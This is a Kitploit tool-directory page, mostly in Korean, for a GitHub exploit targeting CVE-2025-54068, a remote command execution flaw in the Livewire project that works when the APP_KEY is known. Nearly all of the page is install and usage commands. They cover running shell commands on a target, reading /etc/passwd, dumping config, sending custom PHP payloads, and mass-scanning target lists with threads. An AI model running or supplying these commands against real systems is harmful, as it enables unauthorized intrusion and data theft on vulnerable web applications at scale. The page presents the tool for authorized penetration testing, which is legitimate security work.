Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-54068 — A tool designed to exploit CVE-2025-54068 and Remote Command Execution of the Livewire project. | Kitploit
도구/GitHubGitHub/haxorstars/cve-2025-54068
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubhaxorstars/cve-2025-54068

CVE-2025-54068

A tool designed to exploit CVE-2025-54068 and Remote Command Execution of the Livewire project.

저장소 보기
515개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2025-54068

CVE-2025-54068을 악용하고 Livewire 프로젝트의 APP_KEY를 알고 있을 때 원격 명령 실행을 수행하도록 설계된 도구입니다.

이 도구는 Synacktiv의 원본 프로젝트를 재구성한 버전입니다:

  • Livepyre — https://github.com/synacktiv/Livepyre

핵심 개념과 방법론은 원래 구현을 기반으로 합니다. 이 버전에는 유용성과 유연성을 향상시키기 위한 사소한 개선 사항과 추가 기능이 포함되어 있습니다.


설치

pipx를 사용하여 도구 설치:

root@kitploit:~
pipx install git+https://github.com/haxorstars/CVE-2025-54068

또는 uv 사용:

root@kitploit:~
uv tool install git+https://github.com/haxorstars/CVE-2025-54068

🚀 기본 사용법

단일 대상에 대해 도구 실행:

root@kitploit:~
livewire-rce-2025 -u target.com

사용자 정의 매개변수 사용:

root@kitploit:~
livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"

🛠️ 사용자 정의 함수

미리 정의된 사용자 정의 함수 실행:

root@kitploit:~
livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"

여러 함수를 하나의 명령으로 결합:

root@kitploit:~
livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"

🧩 사용자 정의 PHP 파일

자체 PHP 페이로드 파일 사용:

root@kitploit:~
livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"

🧪 페이로드만 생성

대상에 전송하지 않고 페이로드 생성:

root@kitploit:~
livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"

또는 사용자 정의 PHP 파일 사용:

root@kitploit:~
livewire-rce-2025 -generate-payload --custom-file custom.php

📦 대량 확인

파일에서 여러 대상 스캔:

root@kitploit:~
livewire-rce-2025 -mass-check targets.txt -o results.json

사용자 정의 스레드 수:

root@kitploit:~
livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json

⚠️ 면책 조항

이 도구는 교육 및 허가된 보안 테스트 목적으로만 사용됩니다. 소유하지 않거나 테스트할 명시적 권한이 없는 시스템에 사용하지 마십시오.


즐거운 해킹 되세요😄

도구 다운로드